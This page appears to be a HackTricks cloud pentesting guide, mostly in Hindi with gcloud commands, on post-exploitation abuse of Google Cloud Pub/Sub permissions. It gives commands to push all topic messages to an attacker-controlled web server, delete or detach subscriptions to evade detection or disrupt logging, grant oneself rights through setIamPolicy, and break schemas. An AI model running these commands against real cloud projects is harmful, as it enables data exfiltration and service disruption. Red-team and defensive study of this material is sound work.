GCP - Pub/Sub Post Exploitation

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Pub/Sub

Pub/Sub के बारे में अधिक जानकारी के लिए निम्नलिखित पृष्ठ देखें:

pageGCP - Pub/Sub Enum

pubsub.topics.publish

एक विषय में संदेश प्रकाशित करें, अप्रत्याशित डेटा भेजने और अप्रत्याशित कार्यों को ट्रिगर करने या सुरक्षा दोषों का शोध करने के लिए उपयोगी।

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

pubsub.topics.detachSubscription

संदेश प्राप्त करने से बचने के लिए एक सब्सक्रिप्शन को अलग करने के लिए उपयोगी है, शायद पहचान से बचने के लिए।

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

pubsub.topics.delete

सदस्यता को संदेश प्राप्त करने से रोकने के लिए उपयोगी, शायद पहचान से बचने के लिए। एक विषय को हटाना संभव है, यहाँ तक कि उस पर जुड़ी सदस्यताएँ हों।

gcloud pubsub topics delete <TOPIC NAME>

pubsub.topics.update

इस अनुमति का उपयोग करें टॉपिक की कुछ सेटिंग को अपडेट करने के लिए, जैसे --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

pubsub.topics.setIamPolicy

खुद को किसी भी पिछले हमले को करने की अनुमति दें।

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

एक वेब सर्वर में सभी संदेश प्राप्त करें:

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

एक सब्सक्रिप्शन बनाएं और उसका उपयोग करें ताकि मैसेज पुल किया जा सके:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

pubsub.subscriptions.delete

एक सब्सक्रिप्शन को हटाएं एक लॉग प्रोसेसिंग सिस्टम को बाधित करने या कुछ समान के लिए उपयोगी हो सकता है:

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

इस अनुमति का उपयोग करें ताकि कुछ सेटिंग को अपडेट किया जा सके जिससे संदेश एक स्थान में स्टोर किए जा सकें (URL, Big Query तालिका, Bucket) या फिर इसे विघटित किया जा सके।

pubsub.subscriptions.setIamPolicy

खुद को उन अनुमतियों को दें जो पहले टिप्पणीत हमलों को करने के लिए आवश्यक हैं।

pubsub.schemas.delete

एक स्कीमा को हटाएं ताकि ऐसे संदेश भेज सकें जो स्कीमा के साथ मेल नहीं खाते:

gcloud pubsub schemas delete <SCHEMA NAME>

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

एक स्कीमा को एक विषय से जोड़ें ताकि संदेश उसे पूरा न करें और इसलिए विषय में विघटित हो जाए। यदि कोई स्कीमा नहीं है तो आपको एक बनाने की आवश्यकता हो सकती है।

schema.json
{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}

```bash # Attach new schema gcloud pubsub topics update projects//topics/ \ --schema=projects//schemas/ \ --message-encoding=json ``` ### `pubsub.schemas.setIamPolicy`

खुद को उन अनुमतियों को दें जो पहले टिप्पणीत हमलों को करने के लिए आवश्यक हैं।

pubsub.snapshots.create, pubsub.snapshots.seek

यह सभी अनएक्ड संदेशों का एक स्नैपशॉट बनाएगा और उन्हें सब्सक्रिप्शन में वापस डाल देगा। हमलावर के लिए बहुत उपयोगी नहीं है लेकिन यहाँ है:

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

Last updated